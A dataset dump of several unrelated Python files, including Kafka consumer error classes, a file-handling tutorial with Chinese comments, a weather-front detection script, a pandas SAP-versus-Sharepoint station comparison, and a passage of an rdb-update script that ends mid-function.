text
stringlengths 8
6.05M
|
|---|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
"""Contains all consumer error classes raised by the Kafka consumer layer."""
__all__ = [
    'ConsumerConnectionError',
    'AioKafkaConsumerBadParams',
    'KafkaConsumerError',
    'KafkaConsumerNotStartedError',
    'KafkaConsumerAlreadyStartedError',
    'ConsumerKafkaTimeoutError',
    'IllegalOperation',
    'TopicPartitionError',
    'NoPartitionAssigned',
    'OffsetError',
    'UnknownHandler',
    'UnknownStoreRecordHandler',
    'UnknownHandlerReturn',
    'HandlerException',
]
class ConsumerConnectionError(ConnectionError):
    """Raised when the consumer cannot connect to the Kafka broker."""


class AioKafkaConsumerBadParams(ValueError):
    """Raised when the consumer is called with bad parameters."""


class KafkaConsumerError(RuntimeError):
    """Raised when aiokafka raises a generic error."""


class KafkaConsumerNotStartedError(RuntimeError):
    """Raised when the consumer has not been started."""


class KafkaConsumerAlreadyStartedError(RuntimeError):
    """Raised when the consumer has already been started."""


class ConsumerKafkaTimeoutError(TimeoutError):
    """Raised when Tonga times out on the Kafka broker."""


class IllegalOperation(TimeoutError):
    """Raised when the requested topics / partitions do not exist.

    NOTE(review): inherits from TimeoutError, which looks unintentional for
    an existence check -- confirm before changing, since callers may rely on
    catching TimeoutError.
    """


class TopicPartitionError(TypeError):
    """Raised when the topic exists but the desired partition does not."""


class OffsetError(TypeError):
    """Raised when an offset is out of range."""


class NoPartitionAssigned(TypeError):
    """Raised when no partition is assigned to the consumer."""


class UnknownHandler(TypeError):
    """Raised when the consumer receives an event but no handler is found."""


class UnknownHandlerReturn(TypeError):
    """Raised when a handler returns an unknown value."""


class UnknownStoreRecordHandler(TypeError):
    """Raised when the store record handler is unknown."""


class HandlerException(Exception):
    """Raised from within a handler: the consumer does not commit the message
    and retries with the same handler; after 5 raised errors the consumer
    stops listening for events.
    """
|
# Run flake8 over the current directory through its Python API;
# equivalent to `python -m flake8` (with Python >= 2.7).
from flake8.main import main
main()
|
def solution(routes):
    """Return the minimum number of cameras needed to observe every route.

    Greedy sweep: sort the intervals by their exit point, place a camera at
    the exit of the first interval, and add a new camera whenever an interval
    starts after the position of the last placed camera.

    e.g. [[-20, -15], [-18, -13], [-14, -5], [-5, -3]] -> 2

    :param routes: list of [entry, exit] intervals (sorted in place)
    :return: minimum number of cameras; 0 for an empty list
    """
    # BUG FIX: guard against an empty input (previously raised IndexError)
    # and drop the leftover debug print from inside the loop.
    if not routes:
        return 0
    routes.sort(key=lambda interval: interval[1])
    answer = 1
    camera = routes[0][1]
    for interval in routes[1:]:
        # This interval starts after the last camera -> it needs its own.
        if camera < interval[0]:
            answer += 1
            camera = interval[1]
    return answer
|
from db import db


class PriorityLevel(db.Model):
    """Database model for a named priority level."""
    # Auto-incrementing surrogate primary key.
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    # Human-readable name of the priority level; required.
    name = db.Column(db.String, nullable=False)
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# -------------------- Opening files --------------------
print('-' * 20, '打开文件', '-' * 20)
# open(dir, method)
#   dir    - file path; use a raw string to avoid escaping many backslashes
#   method - open mode:
#     r   read-only; raises if the file does not exist
#     w   truncate the file, then write
#     a   append mode (writes start at the end of the file)
#     +   adds read/write to the mode
#     b   binary mode
# Python file objects are iterable line by line: `for line in file`.
"""
with open('read.txt', 'r') as f:
    array = f.readlines()
    print(array)
    res = 0
    for x in array:
        a = float(x.rstrip())
        res += a
    print(res)
"""
# --------------------------------------------------------
# -------------------- File information --------------------
# --------------------------------------------------------
f = open('read.txt', 'r+')
print(dir(f))
# fileno() returns the integer file descriptor (usable for low-level OS I/O)
print('文件名为:\t', f.name)
print('打开方式为:\t', f.mode)
print('文件描述为:\t', f.fileno())
# isatty() -> True when the file is connected to a terminal device.
# BUG FIX: the original tested `f.isatty` (the bound method object), which is
# always truthy, so the else branch could never run.  The method must be
# *called*.
if f.isatty():
    print('文件%s已连接到一个终端设备!' % f.name)
else:
    print('文件%s未连接到一个终端设备!' % f.name)
# closed: whether the file has been closed
if f.closed:
    print('文件%s已关闭!' % f.name)
else:
    print('文件%s未关闭!' % f.name)
# encoding: the text encoding used by the file object
print('%s的编码格式为%s' % (f.name, f.encoding))
print(f.newlines)
f.close()
# --------------------------------------------------------
# -------------------- Reading files --------------------
# --------------------------------------------------------
f = open('read.txt', 'r+', encoding='utf-8')
# readline(): read one line starting at the current position
print('读取文件的第一行:\n\t', f.readline())
# readlines(): read all remaining lines from the current position
print('读取所有行:\n', f.readlines())
# seek(offset[, whence]): move the file pointer
#   offset - byte offset
#   whence - origin: 0 start of file (default), 1 current position, 2 end
f.seek(0, 0)
# NOTE(review): the printed message says "move to the fifth character", but
# seek(0, 0) rewinds to the very beginning -- confirm which was intended.
print('移动指针到开头第五个字符!')
# read([size]): read up to `size` characters from the current position;
# omitted or negative reads everything
print('从当前指针开始,读取9个字节:\n', f.read(9))
# tell(): current position of the file pointer
print('文件指针的位置为:\n\t', f.tell())
# newlines: the newline style(s) observed so far while reading
f.seek(0, 2)
print('当前指针后是否还有行\n\t', f.newlines)
f.close()
# --------------------------------------------------------
# -------------------- 文件写入 --------------------
# --------------------------------------------------------
f = open('write.txt', 'w+', encoding='utf-8')
# write(str) 向文件中写入字符串,返回字符串长度
input_str = 'hello world!\n'
input_len = f.write('hello world!\n')
print('写入内容为:\n\t%s\n写入长度为:\n\t%s' % (repr(input_str), input_len))
# writelines(seq) 写入一个序列字符串列表,如需换行,需自行手动添加
input_list = ['my name is \n', 'MK\n', 'age:24']
f.writelines(input_list)
print('写入内容为:\n\t', repr(input_list))
# flush() 刷新文件内部缓冲,将缓冲区数据写入文件
f.flush()
print('刷新内部缓冲!')
f.close()
"""
with open('test.txt', 'w') as f:
for i in range(0, 3):
content = input('请输入内容:\n')
f.write(content)
if i == 2:
f.flush()
"""
|
#!/usr/bin/python
import argparse
# NOTE(review): sys is imported but unused in this script.
import sys
import os

# Construct the argument parser
ap = argparse.ArgumentParser()
# Add the arguments to the parser
ap.add_argument("-robot", "--robot", required=True, help="name of the robot")
args = vars(ap.parse_args())
robot = args['robot']
# $HOME is expanded by the shell spawned by os.system, not by Python itself.
base_path = "$HOME/catkin_ws/src"
# NOTE(review): the robot name is interpolated into a shell command without
# quoting/escaping -- fine for trusted local use, but a name containing shell
# metacharacters would be interpreted by the shell.
os.system('roslaunch hticros rviz_launcher.launch model:="{}/hticros/urdf/{}.urdf"'.format(base_path,robot))
|
import numpy as np
import xarray as xr
from dataset import Dataset
from config import Config
from utils import load_indexing
from crop import crop_center, crop_2d
from sklearn.metrics import jaccard_similarity_score
def equivalent_potential_temperature(temperature, specific_humidity, pressure):
    """Compute an equivalent potential temperature approximation.

    NOTE(review): the constants match a Bolton-style formulation; units appear
    to be K for temperature, g/kg-scaled specific humidity and hPa for
    pressure -- confirm against the callers.
    """
    # Vapor-pressure-like term derived from pressure and humidity.
    vapor_term = pressure / (622 + specific_humidity)
    # Approximate temperature at the lifting condensation level.
    t_lcl = 2840 / (3.5 * np.log(temperature) - np.log(vapor_term) - 4.805) + 55
    exponent = 0.2854 * (1 - 0.28 * 0.001 * specific_humidity)
    theta = temperature * (1000 / pressure) ** exponent
    moisture_factor = np.exp(
        (3.376 / t_lcl - 0.00254)
        * specific_humidity
        * (1 + 0.81 * 0.001 * specific_humidity)
    )
    return theta * moisture_factor
def gradient_lcc(field):
    """Per-axis numerical gradient of *field* on the model grid.

    NOTE(review): 32.463 appears to be the grid spacing (presumably km) of the
    Lambert conformal grid -- confirm against the dataset definition.
    """
    grid_spacing = 32.463
    return np.gradient(field, grid_spacing)
def abs_lcc(dx, dy):
    """Euclidean magnitude of a vector field given its two components."""
    squared_norm = dx * dx + dy * dy
    return np.sqrt(squared_norm)
def thermal_front_parameter(temperature):
    """Compute the thermal front parameter (TFP) of a 2-D temperature field.

    TFP = -grad(|grad T|) . (grad T / |grad T|).
    NOTE(review): divides by the gradient magnitude with no guard, so grid
    points where the temperature gradient vanishes produce inf/nan.
    """
    gx, gy = gradient_lcc(temperature)
    # Magnitude of the temperature gradient.
    ga = abs_lcc(gx, gy)
    # Gradient of that magnitude.
    ggx, ggy = gradient_lcc(ga)
    return - (ggx * gx + ggy * gy) / ga
def coriolis_parameter(lat):
    """Coriolis parameter f = 2 * Omega * sin(lat), latitude in degrees.

    7.2921e-5 rad/s is Earth's angular velocity Omega.
    """
    lat_radians = np.deg2rad(lat)
    return 2 * 7.2921 * 10 ** -5 * np.sin(lat_radians)
def iou_numpy(outputs: np.array, labels: np.array):
    """Intersection-over-union of two binary masks, smoothed by 1e-12 to
    avoid division by zero on empty masks."""
    smooth = 1e-12
    inter = np.sum(outputs & labels)
    union = np.sum(outputs | labels)
    return (inter + smooth) / (union + smooth)
class HewsonCriterion:
    """Frontal mask from TFP and gradient thresholds (Hewson-style criterion)."""

    def __init__(self, tfp_threshold, grad_threshold):
        # NOTE(review): the /10000 and /100 factors look like unit rescaling
        # of the user-facing threshold values -- confirm the intended units.
        self.tfp_threshold = tfp_threshold / 10000
        self.grad_threshold = grad_threshold / 100

    def apply(self, temperature):
        """Return a boolean mask where both the TFP and the combined gradient
        diagnostic exceed their thresholds."""
        tfp = thermal_front_parameter(temperature)
        temp_grad = abs_lcc(*gradient_lcc(temperature))
        # Gradient magnitude augmented by a term proportional to the gradient
        # of the gradient magnitude (scaled by 1/sqrt(2) times 32.463).
        grad = temp_grad + 1 / np.sqrt(2) * 32.463 * abs_lcc(*gradient_lcc(temp_grad))
        return np.logical_and(tfp > self.tfp_threshold, grad > self.grad_threshold)
class ParfittCriterion:
    """Frontal mask from the temperature gradient scaled by relative vorticity."""

    def __init__(self, threshold):
        # Dimensionless cutoff applied to the diagnostic in ``apply``.
        self.threshold = threshold

    def apply(self, temperature, vorticity, coriolis):
        """Return a boolean mask where the vorticity-scaled temperature
        gradient exceeds the configured threshold."""
        temp_gradient = abs_lcc(*gradient_lcc(temperature))
        normalization = 0.45 / 100 * coriolis
        diagnostic = vorticity * temp_gradient / normalization
        return diagnostic > self.threshold
class HewsonVorticityCriterion:
    """Hewson-style criterion extended with a relative-vorticity condition."""

    def __init__(self, tfp_threshold, grad_threshold, vorticity_threshold):
        # NOTE(review): the /10000 and /100 factors look like unit rescaling
        # of the user-facing threshold values -- confirm the intended units.
        self.tfp_threshold = tfp_threshold / 10000
        self.grad_threshold = grad_threshold / 100
        self.vorticity_threshold = vorticity_threshold

    def apply(self, temperature, vorticity, coriolis):
        """Return a boolean mask where TFP, combined gradient and normalized
        vorticity all exceed their thresholds."""
        tfp = thermal_front_parameter(temperature)
        temp_grad = abs_lcc(*gradient_lcc(temperature))
        grad = temp_grad + 1 / np.sqrt(2) * 32.463 * abs_lcc(*gradient_lcc(temp_grad))
        # Relative vorticity normalized by the local Coriolis parameter.
        vort = vorticity / coriolis
        return np.logical_and.reduce(
            (tfp > self.tfp_threshold, grad > self.grad_threshold, vort > self.vorticity_threshold))
# Dataset / evaluation configuration (paths point at locally mounted drives).
config = Config(
    in_shape=(256, 256),
    n_classes=5,
    varnames=["T", "Q", "VO"],
    filename="/mnt/d4dca524-e11f-4923-8fbe-6066e6efd2fd/ERA5_parameter/era5_regridded.nc",
    truth_filename="/mnt/d4dca524-e11f-4923-8fbe-6066e6efd2fd/NARR/plotted_fronts_fat_binary.nc",
    batch_size=1,
    n_dims=3,
    binary=True,
    standardize=False
)
# Train/validation/test index split saved by a previous run.
train, val, test = load_indexing("indexing.npz")
# Criterion under evaluation; the alternatives are kept for quick switching.
crit = ParfittCriterion(1)
# crit = HewsonVorticityCriterion(0.75, 1.5, 0.8)
# crit = HewsonCriterion(0.75, 3)
# Grid coordinates (and the Coriolis parameter derived from latitude) taken
# from an example NARR file.
with xr.open_dataset("/mnt/ldm_vol_DESKTOP-DSIGH25-Dg0_Volume1/DiplomData2/NARR/air.2m.nc") as example:
    lat = crop_center(crop_2d(example.lat.values), config.in_shape)
    lon = crop_center(crop_2d(example.lon.values), config.in_shape)
    lon = (lon + 220) % 360 - 180  # Shift due to problems with crossing dateline in cartopy
coriolis = coriolis_parameter(lat)
with Dataset(test, config) as test_dataset:
    for i in range(len(test_dataset)):
        x, y_true = test_dataset[i]
        y_true = y_true[0, ..., 0]
        # Input channels follow config.varnames: 0 = T, 1 = Q, 2 = VO.
        etemp = equivalent_potential_temperature(x[0, ..., 0], x[0, ..., 1], 900)
        y_pred = crit.apply(etemp, x[0, ..., 2], coriolis)
        # y_pred = crit.apply(etemp)
        from plot import plot_results
        plot_results(etemp, y_true, y_pred, "plots/criterion/parfitt 1/{}.png".format(i), config.in_shape, test_dataset.get_dates(i)[0],
                     bw=True, binary=True)
        # Only the first 18 samples are plotted.
        if i > 16:
            break
# Kept for reference: manual cartopy plotting of a single prediction.
# import matplotlib.colors
# from matplotlib import pyplot as plt
# from cartopy import crs as ccrs
# proj = ccrs.LambertConformal(
#     central_latitude=50,
#     central_longitude=-107,
#     false_easting=5632642.22547,
#     false_northing=4612545.65137,
#     standard_parallels=(50, 50),
#     cutoff=-30
# )
# f = plt.figure(figsize=(8, 8))
# ax = plt.subplot(1, 1, 1, projection=proj)
# shift = ccrs.PlateCarree(central_longitude=-40)
# ax.set_xmargin(0.1)
# ax.set_ymargin(0.1)
# ax.set_extent((2.0e+6, 1.039e+07, 6.0e+5, 8959788), crs=proj)
# plt.contourf(lon, lat, etemp, levels=20, transform=shift)
# cmap = matplotlib.colors.ListedColormap([(0, 0, 0, 0), 'purple'])
# plt.pcolormesh(lon, lat, y_pred, cmap=cmap, zorder=10, transform=shift)
# ax.coastlines()
# ax.gridlines(draw_labels=True)
# plt.show()
|
import pandas as pd
import numpy as np
import pyttsx3
import os
import shutil
import time
from datetime import date
from openpyxl import load_workbook

# Wall-clock start, used at the end of the script to print the elapsed time.
start = time.time()
print()
today = date.today()
# Daily export folder for the per-country gap workbooks; recreated on each run.
folder_exp = f'E:/Total/Station Data/Master Data/export/AFR_{today}'
if os.path.exists(folder_exp):
    shutil.rmtree(f'{folder_exp}')
    print(f"le dossier AFR_{today} à été bien supprimer et recréer\n-------------")
    print()
else:
    print(f"le dossier AFR_{today} n'existe pas\n-------------")
    print()
os.mkdir(folder_exp)
# folder_list_affiliate= f'E:/Total/Station Data/Master Data/export/list_affiliate_{today}'
# os.mkdir(folder_list_affiliate)
# Source workbooks (SAP and Sharepoint extracts) and the output list workbook.
path_data_SAP = "E:/Total/Station Data/Master Data/Data source/Data-SAP-1.xlsx"
path_data_sharepoint = "E:/Total/Station Data/Master Data/Data source/sharepoint-AFR.xlsx"
path_list = "E:/Total/Station Data/Master Data/Data source/Affiliate_list.xlsx"
def com(df_X, df_Y, col, texte=True):
    """Compare two dataframes on the values of column *col*.

    :param df_X: first dataframe (e.g. the SAP extract)
    :param df_Y: second dataframe (e.g. the Sharepoint extract)
    :param col: name of the column to compare on
    :param texte: when True, print a summary of the differences
    :return: tuple ``(ecart_X, ecart_Y, commun)`` where
             ecart_X = rows of df_X whose *col* value is absent from df_Y,
             ecart_Y = rows of df_Y whose *col* value is absent from df_X,
             commun  = rows of df_X whose *col* value exists in df_Y
    """
    # REFACTOR: the two branches previously duplicated the whole computation;
    # the comparison is now done once and only the printing is conditional.
    # np.setdiff1d sorts and de-duplicates, which is fine here because the
    # result is only used for membership tests.
    diff_X = np.setdiff1d(df_X[col], df_Y[col])
    ecart_X = df_X.loc[df_X[col].isin(diff_X)]
    diff_Y = np.setdiff1d(df_Y[col], df_X[col])
    ecart_Y = df_Y.loc[df_Y[col].isin(diff_Y)]
    commun = df_X.loc[~df_X[col].isin(diff_X)]
    if texte:
        # Same messages, in the same order, as the original verbose branch.
        print("Données SAP versus données Sharepoint :")
        print(f"il y'a {len(diff_X)} code SAP de différence")
        print()
        print("Données Sharepoint versus données SAP :")
        print(f"il y'a {len(diff_Y)} code SAP de différence")
    return ecart_X, ecart_Y, commun
# def com_1(df_X, df_Y, col):
# diff_X = np.setdiff1d(df_X[col] ,df_Y[col])
# ecart_X = df_X.loc[df_X[col].isin(diff_X)]
# # print("Données SAP versus données Sharepoint :")
# # print(f"il y'a {len(diff_X)} code SAP de différence")
# # print()
# diff_Y = np.setdiff1d(df_Y[col], df_X[col])
# ecart_Y = df_Y.loc[df_Y[col].isin(diff_Y)]
# # print("Données Sharepoint versus données SAP :")
# # print(f"il y'a {len(diff_Y)} code SAP de différence")
# commun = df_X.loc[~df_X[col].isin(diff_X)]
# return ecart_X, ecart_Y, commun
def append_df_to_excel(filename, df, sheet_name='Sheet1', startrow=None,
                       truncate_sheet=False,
                       **to_excel_kwargs):
    """
    Append a DataFrame [df] to existing Excel file [filename]
    into [sheet_name] Sheet.
    If [filename] doesn't exist, then this function will create it.
    Parameters:
      filename : File path or existing ExcelWriter
                 (Example: '/path/to/file.xlsx')
      df : dataframe to save to workbook
      sheet_name : Name of sheet which will contain DataFrame.
                   (default: 'Sheet1')
      startrow : upper left cell row to dump data frame.
                 Per default (startrow=None) calculate the last row
                 in the existing DF and write to the next row...
      truncate_sheet : truncate (remove and recreate) [sheet_name]
                       before writing DataFrame to Excel file
      to_excel_kwargs : arguments which will be passed to `DataFrame.to_excel()`
                        [can be dictionary]
    Returns: None

    NOTE(review): assigning ``writer.book`` / ``writer.sheets`` and calling
    ``writer.save()`` relies on pre-1.5 pandas ExcelWriter internals --
    confirm the installed pandas version before reuse.
    """
    # ignore [engine] parameter if it was passed
    if 'engine' in to_excel_kwargs:
        to_excel_kwargs.pop('engine')
    writer = pd.ExcelWriter(filename, engine='openpyxl')
    try:
        # try to open an existing workbook
        writer.book = load_workbook(filename)
        # get the last row in the existing Excel sheet
        # if it was not specified explicitly
        if startrow is None and sheet_name in writer.book.sheetnames:
            startrow = writer.book[sheet_name].max_row
        # truncate sheet
        if truncate_sheet and sheet_name in writer.book.sheetnames:
            # index of [sheet_name] sheet
            idx = writer.book.sheetnames.index(sheet_name)
            # remove [sheet_name]
            writer.book.remove(writer.book.worksheets[idx])
            # create an empty sheet [sheet_name] using old index
            writer.book.create_sheet(sheet_name, idx)
        # copy existing sheets
        writer.sheets = {ws.title:ws for ws in writer.book.worksheets}
    except FileNotFoundError:
        # file does not exist yet, we will create it
        pass
    if startrow is None:
        startrow = 0
    # write out the new sheet
    df.to_excel(writer, sheet_name, startrow=startrow, **to_excel_kwargs)
    # save the workbook
    writer.save()
def comparer(Pays):
    """For each affiliate sheet name in *Pays*, compare SAP vs Sharepoint data.

    Writes one gap workbook per country into the export folder and appends a
    consolidated per-country sheet to the affiliate list workbook.

    :param Pays: iterable of sheet names present in both source workbooks
    """
    # Recreate the affiliate-list workbook from the raw sharepoint dump.
    if os.path.exists(path_list):
        os.remove(path_list)
        print("le fichier 'Affiliate_list.xlsx' à été bien supprimer et recréer\n-------------")
    else:
        print("le fichier 'Affiliate_list.xlsx' n'existe pas\n-------------")
    data_sharepoint = pd.read_excel('E:/Total/Station Data/Master Data/Data source/all-data-sharepoint.xlsx')
    writer_list = pd.ExcelWriter(path_list, engine = 'openpyxl')
    data_sharepoint.to_excel(writer_list, sheet_name = 'Station Data Brute', index=False)
    writer_list.save()
    writer_list.close()
    print()
    for i in Pays:
        element = i
        # print()
        print('-'*20)
        print(f"Pays : {element}")
        print('-'*20)
        # Per-country output workbook holding the differences computed below.
        path_ecart = f"{folder_exp}/{element + '_' + str(today)}.xlsx"
        #path_list = f"{folder_list_affiliate}/list_affiliate_{str(today)}.xlsx"
        df_sap = pd.read_excel(path_data_SAP, sheet_name=element)
        df_sap.rename(columns={'SAPCODE': 'SAPCode'}, inplace=True)
        df_sap = df_sap.drop_duplicates(subset = "SAPCode", keep = 'first')
        dim_sap = df_sap.shape
        print(f"dimension données SAP pour {element} est : {dim_sap}")
        df_sap['SAPCode'] = df_sap['SAPCode'].str.strip()
        df_sharepoint = pd.read_excel(path_data_sharepoint, sheet_name=element)
        df_sharepoint = df_sharepoint.drop_duplicates()
        dim_sharepoint = df_sharepoint.shape
        print(f"dimension données sharepoint pour {element} est : {dim_sharepoint}")
        df_sharepoint['SAPCode'] = df_sharepoint['SAPCode'].str.strip()
        print()
        print("Comparaison :")
        print('-'*7)
        # Three successive comparisons: raw SAPCode first, then the *_BM and
        # *_BM_ISACTIVESITE composite keys applied to the remaining rows.
        X, Y, df_commun_1 = com(df_sap, df_sharepoint, 'SAPCode')
        a, cost, df_commun_2 = com(df_commun_1, df_sharepoint, 'SAPCode_BM', texte=False)
        b, cost, df_commun_3 = com(df_commun_2, df_sharepoint, 'SAPCode_BM_ISACTIVESITE', texte=False)
        writer = pd.ExcelWriter(path_ecart, engine = 'openpyxl')
        df_sap.to_excel(writer, sheet_name = 'Data_SAP_Brute', index=False)
        df_sharepoint.to_excel(writer, sheet_name = 'Data_Sharepoint_Brute', index=False)
        X.to_excel(writer, sheet_name = 'ecart_SAP_vs_Sharepoint', index=False)
        Y.to_excel(writer, sheet_name = 'ecart_Sharepoint_vs_SAP', index=False)
        a.to_excel(writer, sheet_name = 'SAP_vs_Sharepoint_SAPCode_BM', index=False)
        b.to_excel(writer, sheet_name = 'SAP_vs_Sharepoint_SAPCode_BM_ISACTIVESITE', index=False)
        writer.save()
        writer.close()
        print()
        print('#'*70)
        print()
        # sh = pd.read_excel("C:/Users/J1049122/Desktop/Station Data/Master-Data/Data source/Data-SAP.xlsx")
        # sh = sh.drop_duplicates()
        # sh['SAPCode'] = sh['SAPCode'].str.strip()
        # z = sh['Affiliate'].unique()
        # # for w in z:
        # d = sh[sh['Affiliate']==w]
        # Rows present in SAP but missing from Sharepoint, reshaped into the
        # Sharepoint column layout so they can be appended below.
        ecart_sap = X.copy()
        ecart_sap = ecart_sap[["SAPCode", "Affiliate", "FINAL_SITENAME", "SITETOWN", "ISACTIVESITE", "BUSINESSMODEL", "BM_source"]]
        ecart_sap.columns = ['SAPCode', 'Affiliate', 'SAPName', 'Town', 'IsActiveSite', 'BUSINESSMODEL', 'BM_source']
        # Columns that only exist on the Sharepoint side; created empty.
        colonnes = ['Zone', 'SubZone', 'IntermediateStatus', 'Brand', 'Segment', 'ContractMode', 'ShopSegment', 'SFSActivity', 'SFSContractType', 'PartnerOrBrand', 'TargetKit', 'TargetPOSprovider',
                    'EstimatedInstallationDate', 'InstalledSolutionOnSite', 'SolutionProvider', 'SolutionInstallationDate', 'Status', 'SolutionRelease', 'SystemOwner', 'ConfigurationStatus',
                    'IsAllPumpsConnectedToFCC', 'Reason', 'AutomaticTankGauging', 'ATGProvider', 'ATGModel', 'ATGConnected', 'ATGInstallationDate', 'TotalCardEPT connection', 'FuelCardProvider',
                    'EPTHardware', 'EPTModel', 'EPTNumber', 'EPTConnected', 'PaymentLocation', 'HOSInstalled', 'HOSProvider', 'WSMSoftwareInstalled', 'WSMProvider', 'TELECOM', 'STABILITE TELECOM',
                    'STARTBOXStatus', 'BM_source'
                    ]
        for col in colonnes:
            ecart_sap[col] = ""
        all_cols_ordonner = ['SAPCode', 'Zone', 'SubZone', 'Affiliate', 'SAPName', 'Town',
                             'IsActiveSite', 'IntermediateStatus', 'Brand', 'Segment',
                             'BUSINESSMODEL', 'ContractMode', 'ShopSegment', 'SFSActivity',
                             'SFSContractType', 'PartnerOrBrand', 'TargetKit', 'TargetPOSprovider',
                             'EstimatedInstallationDate', 'InstalledSolutionOnSite',
                             'SolutionProvider', 'SolutionInstallationDate', 'Status',
                             'SolutionRelease', 'SystemOwner', 'ConfigurationStatus',
                             'IsAllPumpsConnectedToFCC', 'Reason', 'AutomaticTankGauging',
                             'ATGProvider', 'ATGModel', 'ATGConnected', 'ATGInstallationDate',
                             'TotalCardEPT connection', 'FuelCardProvider', 'EPTHardware',
                             'EPTModel', 'EPTNumber', 'EPTConnected', 'PaymentLocation',
                             'HOSInstalled', 'HOSProvider', 'WSMSoftwareInstalled', 'WSMProvider',
                             'TELECOM', 'STABILITE TELECOM', 'STARTBOXStatus', 'BM_source']
        ecart_sap1=ecart_sap.reindex(columns= all_cols_ordonner)
        ecart_sap1['data_source'] = "ecart SAP"
        # Closed business models are excluded from the consolidated output.
        ecart_sap1 = ecart_sap1[ecart_sap1['BUSINESSMODEL'] != 'CLOS']
        sh = df_sharepoint.copy()
        # Propagate the business model found in the *_BM comparison back into
        # the sharepoint frame.
        # NOTE(review): chained assignment via column[...].iloc[...] may not
        # write through on newer pandas -- verify behaviour before upgrading.
        if a.shape[0] > 0:
            for j in range(a.shape[0]):
                for k in range(sh.shape[0]):
                    if a['SAPCode'].iloc[j] == sh['SAPCode'].iloc[k]:
                        sh['BUSINESSMODEL'].iloc[k] = a['BUSINESSMODEL'].iloc[j]
                        sh['BM_source'].iloc[k] = a['BM_source'].iloc[j]
        sh = sh[['SAPCode', 'Zone', 'SubZone', 'Affiliate', 'SAPName', 'Town','IsActiveSite', 'IntermediateStatus', 'Brand', 'Segment',
                 'BUSINESSMODEL', 'ContractMode', 'ShopSegment', 'SFSActivity', 'SFSContractType', 'PartnerOrBrand', 'TargetKit', 'TargetPOSprovider',
                 'EstimatedInstallationDate', 'InstalledSolutionOnSite', 'SolutionProvider', 'SolutionInstallationDate', 'Status',
                 'SolutionRelease', 'SystemOwner', 'ConfigurationStatus', 'IsAllPumpsConnectedToFCC', 'Reason', 'AutomaticTankGauging',
                 'ATGProvider', 'ATGModel', 'ATGConnected', 'ATGInstallationDate', 'TotalCardEPT connection', 'FuelCardProvider', 'EPTHardware',
                 'EPTModel', 'EPTNumber', 'EPTConnected', 'PaymentLocation', 'HOSInstalled', 'HOSProvider', 'WSMSoftwareInstalled', 'WSMProvider',
                 'TELECOM', 'STABILITE TELECOM', 'STARTBOXStatus', 'BM_source']]
        sh['data_source'] = "Station Data"
        sh_1 = sh.append(ecart_sap1, ignore_index=True)
        # Append the consolidated sheet for this country to the list workbook.
        book = load_workbook(path_list)
        writer_list = pd.ExcelWriter(path_list, engine = 'openpyxl')
        writer_list.book = book
        sh_1.to_excel(writer_list, sheet_name = element, index=False)
        writer_list.save()
        writer_list.close()
# Affiliate sheets to process.
pays = ['Botswana', 'Ghana', 'Kenya', 'Mauritius', 'Malawi', 'Mozambique', 'Namibia',
        'Nigeria', 'Tanzania', 'Uganda', 'South Africa', 'Zambia',
        'Zimbabwe', 'Central Afr.Rep', 'Congo', 'Cameroon', 'Gabon', 'Guinea Conakry',
        'Equatorial Gui.', 'Morocco', 'Mali', 'Senegal', 'Chad', 'Togo', 'Mayotte']
comparer(pays)
print()
print("--------------------")
print("Terminer avec succès")
print("--------------------")
print()
# BUG FIX: time.ctime(elapsed) interprets the elapsed seconds as an absolute
# epoch timestamp rendered in *local* time, so the sliced HH:MM:SS was shifted
# by the machine's UTC offset.  Format the duration explicitly instead.
print(time.strftime('%H:%M:%S', time.gmtime(time.time() - start)))
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#################################################################################
#                                                                               #
#   update_rdb.py: update dataseeker rdb files for ccdm, pacd, mups, and elbi   #
#                                                                               #
#           author: t. isobe (tisobe@cfa.harvard.edu)                           #
#                                                                               #
#           last update: Mar 04, 2021                                           #
#                                                                               #
#################################################################################
import os
import sys
import re
import string
import random
import operator
import math
import time
#
#--- read the house-keeping directory list and expose each entry as a
#--- module-level variable (e.g. bin_dir, mta_dir, house_keeping, main_dir).
#
path = '/data/mta/Script/Dumps/Scripts/house_keeping/dir_list'
with open(path, 'r') as f:
    data = [line.strip() for line in f.readlines()]
for ent in data:
    atemp = re.split(':', ent)
    var = atemp[1].strip()
    line = atemp[0].strip()
    # NOTE(review): exec() on file contents -- acceptable only because
    # dir_list is a trusted, locally controlled configuration file.
    exec("%s = %s" %(var, line))
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
#--- import several functions
#
import pcadfilter
import ccdmfilter
import maverage
import mta_common_functions as mcf
#
#--- temp writing file name (randomized so parallel runs do not collide)
#
rtail = int(time.time()*random.random())
zspace = '/tmp/zspace' + str(rtail)
#-----------------------------------------------------------------------------------
#-- run_rdb_updates: update dataseeker rdb files of ccdm, pacad, mups, and elbilow -
#-----------------------------------------------------------------------------------
def run_rdb_updates():
    """
    update dataseeker rdb files of ccdm, pacad, mups, and elbilow
    input: none but read from the current trace log files
    output: updated rdb files of ccdm, pacad, mups, and elbilow
    """
#
#--- read the already processed data list
#
    pfile = house_keeping + 'rdb_processed_list'
    pdata = mcf.read_data_file(pfile)
#
#--- read the currently available data list
#
    cmd = 'ls ' + main_dir + '/*.tl > ' + zspace
    os.system(cmd)
    cdata = mcf.read_data_file(zspace, remove=1)
#
#--- find new data
#
    ndata = list(set(cdata) - set(pdata))
#
#--- if there is no new data, stop.  BUG FIX: this is a normal condition, so
#--- return instead of exit(1), which signaled an error exit status.
#
    if len(ndata) == 0:
        return
#
#--- make lists for ccdm, pcad, mups...
#--- also update already processed data list
#--- (context managers guarantee the handles are closed even on error)
#
    with open(pfile, 'w') as fo, \
         open('./ccdmlist', 'w') as fc, \
         open('./pcadlist', 'w') as fp, \
         open('./mupslist1', 'w') as fm, \
         open('./mupslist2', 'w') as fn, \
         open('./elbilist', 'w') as fe:
        for ent in ndata:
            fo.write(ent + '\n')
            if make_select_list(fc, ent, 'CCDM'):
                continue
            if make_select_list(fp, ent, 'PCAD'):
                continue
            if make_select_list(fm, ent, 'MUPSMUPS1'):
                continue
            if make_select_list(fn, ent, 'MUPSMUPS2'):
                continue
            if make_select_list(fe, ent, 'ELBILOW'):
                continue
#
#--- run pcad update
#
    pcadfilter.pcadfilter('./pcadlist')
#
#--- run ccdm update
#
    ccdmfilter.ccdmfilter('./ccdmlist')
#
#--- run mups1 udpate; mups2 update will be done separately
#
    maverage.maverage('mupslist1', 'mups_1.rdb')
